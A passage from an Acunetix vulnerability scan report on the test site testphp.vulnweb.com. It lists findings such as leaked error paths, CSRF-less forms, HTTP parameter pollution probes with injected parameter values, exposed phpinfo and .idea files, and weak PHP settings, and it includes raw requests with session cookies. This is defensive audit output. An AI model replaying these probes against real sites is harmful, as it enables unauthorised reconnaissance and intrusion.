OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/wvstests/pmwiki_2_1_19/scripts
Details
Pattern found: <title>Index of /wvstests/pmwiki_2_1_19/scripts/</title>
GET /wvstests/pmwiki_2_1_19/scripts/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
104Acunetix Website Audit
Error message on page
MediumSeverity
ValidationType
Scripting (Text_Search_File.script)Reported by module
Description
This page contains an error/warning message that may disclose sensitive information. The message can also contain thelocation of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.
Impact
The error messages may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Review the source code for this script.
References
PHP Runtime Configuration
Affected items
/AJAX/infoartist.php
Details
Pattern found: <b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, boolean given in<b>/hj/var/www//AJAX/infoartist.php</b> on line <b>2</b><br />
GET /AJAX/infoartist.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/AJAX/index.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/AJAX/infocateg.php
Details
Pattern found: <b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, boolean given in<b>/hj/var/www//AJAX/infocateg.php</b> on line <b>2</b><br />
GET /AJAX/infocateg.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/AJAX/index.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Request headers
105Acunetix Website Audit
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/AJAX/infotitle.php
Details
Pattern found: <b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, boolean given in<b>/hj/var/www//AJAX/infotitle.php</b> on line <b>2</b><br />
GET /AJAX/infotitle.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/AJAX/index.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Connections/DB_Connection.php
Details
Pattern found: Fatal error
GET /Connections/DB_Connection.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/pictures/path-disclosure-unix.html
Details
Pattern found: <b>Warning</b>: Sablotron error on line 1: XML parser error 3: no element found in<b>/usr/local/etc/httpd/htdocs2/destination-ce/destinationce/system/class/xsltTransform.class.php</b> on line<b>70</b><br />
GET /pictures/path-disclosure-unix.html HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Request headers
106Acunetix Website Audit
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/secured/database_connect.php
Details
Pattern found: <b>Warning</b>: mysql_connect(): Access denied for user 'wauser'@'localhost' (using password: NO) in<b>/hj/var/www//secured/database_connect.php</b> on line <b>2</b><br />
GET /secured/database_connect.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
107Acunetix Website Audit
HTML form without CSRF protection
MediumSeverity
InformationalType
CrawlerReported by module
Description
This alert may be a false positive, manual confirmation is required.Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is atype of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the websitetrusts. Acunetix WVS found a HTML form with no apparent CSRF protection implemented. Consult details for more informationabout the affected HTML form.
Impact
An attacker may force the users of a web application to execute actions of the attacker''s choosing. A successful CSRFexploit can compromise end user data and operation in case of normal user. If the targeted end user is the administratoraccount, this can compromise the entire web application.
Recommendation
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.
Affected items
/
Details
Form name: <empty>Form action: http://testphp.vulnweb.com/search.php?test=queryForm method: POST Form inputs: - searchFor [Text]- goButton [Submit]
GET / HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-Alive
Accept-Encoding: gzip,deflate
Accept-Language: en-US,*
Host: testphp.vulnweb.com
Request headers
/comment.php (7aae61e4ef757b75f29861b71d32976e)
Details
Form name: fCommentForm action: http://testphp.vulnweb.com/comment.phpForm method: POST Form inputs: - name [Text]- comment [TextArea]- Submit [Submit]- phpaction [Hidden]
GET /comment.php?aid=1 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Request headers
108Acunetix Website Audit
Referer: http://testphp.vulnweb.com/artists.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/hpp (fbc1d56ba0737d3fa577aa5a19c9fd49)
Details
Form name: <empty>Form action: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12Form method: GET Form inputs: - aaaa [Submit]
GET /hpp/?pp=12 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/hpp/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/signup.php
Details
Form name: form1Form action: http://testphp.vulnweb.com/secured/newuser.phpForm method: POST Form inputs: - uuname [Text]- upass [Password]- upass2 [Password]- urname [Text]- ucc [Text]- uemail [Text]- uphone [Text]- uaddress [TextArea]- signup [Submit]
GET /signup.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
109Acunetix Website Audit
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/userinfo.php (9d1db3f4d16732c9716e14a3e959fa2d)
Details
Form name: form1Form action: http://testphp.vulnweb.com/userinfo.phpForm method: POST Form inputs: - urname [Text]- ucc [Text]- uemail [Text]- uphone [Text]- uaddress [TextArea]- update [Submit]
POST /userinfo.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://testphp.vulnweb.com/login.php
Origin: http://testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: Keep-Alive
Accept-Encoding: gzip,deflate
Accept-Language: en-US,*
Host: testphp.vulnweb.com
uname=test&pass=test
Request headers
110Acunetix Website Audit
HTTP parameter pollution
MediumSeverity
ConfigurationType
Scripting (HTTP_Parameter_Pollution.script)Reported by module
Description
This script is possibly vulnerable to HTTP Parameter Pollution attacks. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web applicationdoes not properly sanitize the user input, a malicious user can compromise the logic of the application to perform eitherclientside or server-side attacks.
Impact
The impact depends on the affected web application. An attacker could - Override existing hardcoded HTTP parameters- Modify the application behaviors- Access and, potentially exploit, uncontrollable variables- Bypass input validation checkpoints and WAFs rules
Recommendation
The application should properly sanitize user input (URL encode) to protect against this vulnerability.
References
HTTP Parameter Pollution
Affected items
/hpp/
Details
URL encoded GET input pp was set to 12&n998091=v937951Parameter precedence: last occurrenceAffected link: params.php?p=valid&pp=12&n998091=v937951Affected parameter: p=valid
GET /hpp/?pp=12%26n998091=v937951 HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/hpp/index.php
Details
URL encoded GET input pp was set to 12&n990103=v954437Parameter precedence: last occurrenceAffected link: params.php?p=valid&pp=12&n990103=v954437Affected parameter: p=valid
GET /hpp/index.php?pp=12%26n990103=v954437 HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
111Acunetix Website Audit
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
112Acunetix Website Audit
Insecure crossdomain.xml file
MediumSeverity
ConfigurationType
Scripting (Crossdomain_XML.script)Reported by module
Description
The browser security model normally prevents web content from one domain from accessing data from another domain.This is commonly known as the "same origin policy". URL policy files grant cross-domain permissions for reading data.They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory ofthe target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml). When a domain is specified in crossdomain.xml file, the site declares that it is willing to allow the operators of anyservers in that domain to obtain any document on the server where the policy file resides. The crossdomain.xml filedeployed on this website opens the server to all domains (use of a single asterisk "*" as a pure wildcard is supported) likeso: <cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>This practice is suitable for public servers, but should not be used for sites located behind a firewall because it couldpermit access to protected areas. It should not be used for sites that require authentication in the form of passwords orcookies. Sites that use the common practice of authentication based on cookies to access private or user-specific datashould be especially careful when using cross-domain policy files.
Impact
Using an insecure cross-domain policy file could expose your site to various attacks.
Recommendation
Carefully evaluate which sites will be allowed to make cross-domain calls. Consider network topology and anyauthentication mechanisms that will be affected by the configuration or implementation of the cross-domain policy.
References
Cross-domain policy file usage recommendations for Flash Player
Cross-domain policy files
Affected items
Web Server
Details
The crossdomain.xml file is located at /crossdomain.xml
GET /crossdomain.xml HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
113Acunetix Website Audit
JetBrains .idea project directory
MediumSeverity
ValidationType
Scripting (JetBrains_Idea_Project_Directory.script)Reported by module
Description
The .idea directory contains a set of configuration files (.xml) for your project. These configuration files containinformation core to the project itself, such as names and locations of its component modules, compiler settings, etc. Ifyou've defined a data source the file dataSources.ids contains information for connecting to the database andcredentials. The workspace.xml file stores personal settings such as placement and positions of your windows, your VCSand History settings, and other data pertaining to the development environment. It also contains a list of changed filesand other sensitive information. These files should not be present on a production system.
Impact
These files may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
Remove these files from production systems or restrict access to the .idea directory. To deny access to all the .ideafolders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from.htaccess): <Directory ~ "\.idea">Order allow,denyDeny from all</Directory>
References
Apache Tips & Tricks: Deny access to some folders
Affected items
/
Details
workspace.xml project file found at : /.idea/workspace.xmlPattern found: <project version="4">
GET /.idea/workspace.xml HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
114Acunetix Website Audit
PHP allow_url_fopen enabled
MediumSeverity
ConfigurationType
Scripting (PHPInfo.script)Reported by module
Description
The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval fromremote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based webapplications are caused by the combination of enabling allow_url_fopen and bad input filtering. allow_url_fopen is enabled by default.
Impact
Application dependant - possible remote file inclusion.
Recommendation
You can disable allow_url_fopen from php.ini or .htaccess. php.iniallow_url_fopen = 'off' .htaccessphp_flag allow_url_fopen off
References
Runtime Configuration
Affected items
/secured/phpinfo.php
Details
This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpallow_url_fopen: On
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
115Acunetix Website Audit
PHP errors enabled
MediumSeverity
ConfigurationType
Scripting (PHPInfo.script)Reported by module
Description
The display_errors directive determines whether error messages should be sent to the browser. These messagesfrequently contain sensitive information about your web application environment, and should never be presented tountrusted sources. display_errors is on by default.
Impact
Possible information disclosure.
Recommendation
You can disable display_errors from php.ini or .htaccess. php.inidisplay_errors = 'off'log_errors = 'on' .htaccessphp_flag display_errors offphp_flag log_errors on
References
Runtime Configuration
Affected items
/secured/phpinfo.php
Details
This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpdisplay_errors: On
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
Web Server
Details
Current setting is : display_errors = 1
116Acunetix Website Audit
PHP open_basedir is not set
MediumSeverity
ConfigurationType
Scripting (PHPInfo.script)Reported by module
Description
The open_basedir configuration directive will limit the files that can be opened by PHP to the specified directory-tree.When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the fileis outside the specified directory-tree, PHP will refuse to open it. open_basedir is a good protection against remote fileinclusion vulnerabilities. For a remote attacker it is not possible to break out of the open_basedir restrictions if he is onlyable to inject the name of a file to be included. Therefore the number of files he will be able to include with such a localfile include vulnerability is limited.
Impact
Application dependant - possible remote code inclusion.
Recommendation
You can set open_basedir from php.ini php.iniopen_basedir = your_application_directory
References
Description of core php.ini directives
Affected items
/secured/phpinfo.php
Details
This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpopen_basedir: no value
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
117Acunetix Website Audit
PHP session.use_only_cookies disabled
MediumSeverity
ConfigurationType
Scripting (PHPInfo.script)Reported by module
Description
When use_only_cookies is disabled, PHP will pass the session ID via the URL. This makes the application morevulnerable to session hijacking attacks. Session hijacking is basically a form of identity theft wherein a hackerimpersonates a legitimate user by stealing his session ID. When the session token is transmitted in a cookie, and therequest is made on a secure channel (that is, it uses SSL), the token is secure.
Impact
Application dependant - possible session hijacking.
Recommendation
You can enabled session.use_only_cookies from php.ini or .htaccess. php.inisession.use_only_cookies = 'on' .htaccessphp_flag session.use_only_cookies on
References
Runtime Configuration
Affected items
/secured/phpinfo.php
Details
This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.phpsession.use_only_cookies: On
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
118Acunetix Website Audit
PHPinfo page
MediumSeverity
ValidationType
Scripting (PHPInfo.script)Reported by module
Description
PHPinfo page has been found in this directory. The PHPinfo page outputs a large amount of information about thecurrent state of PHP. This includes information about PHP compilation options and extensions, the PHP version, serverinformation and environment (if compiled as a module), the PHP environment, OS version information, paths, master andlocal values of configuration options, HTTP headers, and the PHP License.
Impact
This file may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
Remove the file from production systems.
References
PHP phpinfo
Affected items
/secured/phpinfo.php
Details
phpinfo() page found at : /secured/phpinfo.php
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
119Acunetix Website Audit
PHPinfo page found
MediumSeverity
ValidationType
Scripting (Text_Search_File.script)Reported by module
Description
This script is using phpinfo() function. This function outputs a large amount of information about the current state of PHP.This includes information about PHP compilation options and extensions, the PHP version, server information andenvironment (if compiled as a module), the PHP environment, OS version information, paths, master and local values ofconfiguration options, HTTP headers, and the PHP License.
Impact
This file may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
Remove the file from production systems.
References
PHP phpinfo
Affected items
/secured/phpinfo.php
Details
Pattern found: <title>phpinfo()</title>
GET /secured/phpinfo.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
120Acunetix Website Audit
Source code disclosure
MediumSeverity
ValidationType
Scripting (Text_Search_File.script)Reported by module
Description
Looks like the source code for this script is available. This check is using pattern matching to determine if server sidetags are found in the file. In some cases this alert may generate false positives.
Impact
An attacker can gather sensitive information (database connection strings, application logic) by analyzing the sourcecode. This information can be used to conduct further attacks.
Recommendation
Remove this file from your website or change its permissions to remove access.
References
Source Code Disclosure
Affected items
/index.bak
Details
